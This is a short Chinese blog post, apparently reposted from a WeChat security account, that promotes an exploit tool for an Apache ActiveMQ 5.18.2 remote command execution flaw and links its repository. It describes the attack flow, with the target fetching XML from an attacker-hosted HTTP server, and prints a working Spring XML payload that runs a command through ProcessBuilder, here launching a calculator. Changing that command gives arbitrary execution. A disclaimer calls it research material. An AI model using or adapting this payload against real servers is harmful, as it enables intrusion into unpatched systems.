仓库:https://github.com/JaneMandy/ActiveMQExploit
最近出了一个ActiveMQ 新漏洞,正好在参加活动的过程中,我们开发了一个相应的漏洞利用工具(Exploit)。
虽然我们不会深入详细分析这个漏洞,但已经有一些安全专家对其进行了分析。这个漏洞需要您搭建一个HTTP服务,我们的Exploit将发送Payload到目标服务器。目标服务器会下载这个Payload,其中包含XML数据,并执行相关操作。我们希望所有安全专家都能充分利用这个漏洞,获得更多的洞察和经验。
图:漏洞利用
Payload代码
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=" http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>open</value>
<value>-a</value>
<value>calculator</value>
</list>
</constructor-arg>
</bean>
</beans>
请勿用途,非法用途
原文始发于微信公众号(猫头鹰安全团队):Apache - ActiveMQ 5.18.2 远程命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论